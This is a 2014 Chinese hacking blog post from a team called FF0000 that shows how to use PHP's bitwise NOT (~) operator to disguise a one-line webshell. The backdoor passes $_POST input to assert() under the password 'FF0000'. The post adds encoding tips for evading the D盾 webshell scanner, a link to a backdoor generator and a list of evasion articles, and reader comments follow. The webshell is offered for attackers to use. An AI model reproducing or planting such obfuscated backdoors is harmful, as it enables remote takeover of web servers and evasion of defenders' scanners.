.::PHP中使用按位取反(~)函数创建后门::.

We enjoy hacking of life in day and night.
_______________________________________________

[+] Author: Evi1m0 <evi1m0.bat#gmail.com>
[+] Team: FF0000 TEAM <http://www.ff0000.cc>
[+] From: HackerSoul <http://www.hackersoul.com>
[+] Create: 2014-02-04
_______________________________________________

-= Main =-

1)PHP ~位运算符

前一段时间老外在twitter上爆出个有趣的东西,一串疑似乱码的字符串访问后却能正常输出1337。

PHP: 位运算符 - http://www.php.net/manual/zh/language.operators.bitwise.php

~ $a
Not(按位取反)
将 $a 中为 0 的位设为 1,反之亦然。

PHP 的 ini 设定 error_reporting 使用了按位的值,提供了关闭某个位的真实例子。要显示除了提示级别之外的所有错误。

php.ini 中是这样用的:E_ALL & ~E_NOTICE

具体运作方式是先取得 E_ALL 的值:00000000000000000111011111111111

再取得 E_NOTICE 的值:00000000000000000000000000001000

然后通过 ~ 将其取反:11111111111111111111111111110111

最后再用按位与 AND(&)得到两个值中都设定了(为 1)的位:00000000000000000111011111110111

2)分析并重现

这个就是当时最原始的代码实现效果:

当时最原始的代码实现效果

当看到这个效果的时候最先想到的就是绕过防火墙等后门的实现,之后开始考虑这是哪种编码方式?

后来同李普君测试中发现直接使用echo ~'1';等则会直接输出以上的'乱码'。

直接使用echo ~'1';等则会直接输出以上的'乱码'。

那么我们便可以开始写一句话试试效果了:

<?php
$x=~Ÿ¬¬º­«;
$x($_POST[~¹¹ÏÏÏÏ]);
?>

这里定义$x变量为ASSERT,然后密码为FF0000直接链接后门便可,因为当位取反出来'乱码'后我们再取一次反即可返回正常值。

这里定义$x变量为ASSERT,然后密码为FF0000直接链接后门便可,因为当位取反出来'乱码'后我们再取一次反即可返回正常值。

3)关于编码与免杀

当重现这个后门的时候我发现,直接Copy过来的直接HTTP状态500,源头是编码问题,上面这种'乱码'其实为西欧(ISO-8859-15)。

实际过程中我们遇到了多次后门无法链接出现500的错误均势因为编码问题,如果默认编码无法识别将编码方式保存为这种即可(GBK\UTF8\...均不能成功使用)

D盾_Web查杀

4)留在最后

我们写了一个小脚本为了方便生成:http://www.hackersoul.com/tools/Createbackdoor-1.php

使用方法:Createbackdoor-1.php?pwd=password

-= END =-

[原文地址]

相关内容:

Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本

如何查找php木马后门高级篇

PHP漏洞挖掘思路+实例

"一句话"的艺术——简单的编码和变形绕过检测

XSS与字符编码的那些事儿 ---科普文

DVWA中学习PHP常见漏洞及修复方法

对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀

PHP安全编码

php图片木马绕过图片缩放、压缩、二次转码等“破坏性”过滤

那些强悍的PHP一句话后门

简单绕过安全狗进行任何操作 让狗形同虚设

网爆安全狗存在远程溢出漏洞

实战这些年咬过我们的安全狗(总结篇)

PHP脚本程序源码,采集百度下拉框的数据

看哥是怎么突破安全狗和360网站卫士的

破那个垃圾安全狗技术总汇

php包含那点事情

用.htaccess做更隐蔽的后门,另类PHP后门

PHP后门生成工具weevely分析

php上传绕过及缺陷经验解说

PHPCMS V9 WAP 模块注入漏洞

IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结

安全狗 iis 6.0 ; 截断解析突破

关于php后门的编写

高级PHP应用程序漏洞审核技术

PHP Mysql 密码暴力破解,本机暴力破解 3306 端口,源码

利用GBK双字节编码突破PHP单引号转义限制进行SQL注入

PHP 双字节、宽字节编码漏洞

PHP Web 木马扫描器 - 安全测试工具

浅析php后门木马 - 技术文章

phpcms /yp/product.php 代码执行漏洞 EXP

JPEG MetaData and .Htaccess For Webshell Hiden

PHP168 V6.02 整站系统远程执行任意代码漏洞

利用 .htaccess 来执行马儿

《Code Injection》 - PHP Eval 代码注入执行

【PHP】PHP获取网页的 Html源代码输出并执行

【PHP】获取指定网站、网页、URL Html源代码

【PHP】PHP 将字符串进行 Html 编码,转义字符

【PHP】PHP 客户端浏览器页面跳转,网页重定向

【PHP】查找、判断字符串在另字符串中是否存在

【PHP】生成中文文字图片 图片加中文文字水印

【PHP】htmlspecialchars() Html编码函数详解

【PHP】header 发送HTTP报头函数功能详解

PHP error_reporting() 错误控制函数功能详解

【PHP】Discuz 发贴机器人源码

一句话木马大全

留言评论(旧系统):

佚名 @ 2014-08-23 23:11:49

这类后门想要多少就多少,根本不值得讨论。 应该关注一些cdn供应商在马上传或请求过程中设置防火墙,菜刀现在都是渣渣,谁都可以拦。 自己写个网页版的简易管理,想怎么加密就怎么加密,要多爽有多爽

本站回复:

求贵宾,提供一个值得讨论的后门~

我爱核总我想当老板 @ 2014-08-25 09:44:41

http://news.cnhubei.com/xw/wuhan/201305/t2568395.shtml

本站回复:

site:lcx.cc 创业

flowind @ 2014-08-27 19:00:03

下载各种shell查杀 查看规则..绕过之...

本站回复:

-_-|||

小鸣子 @ 2014-10-10 11:42:14

试过的人才知道,给的利用代码跑不起来,得加“”

本站回复:

-_-|||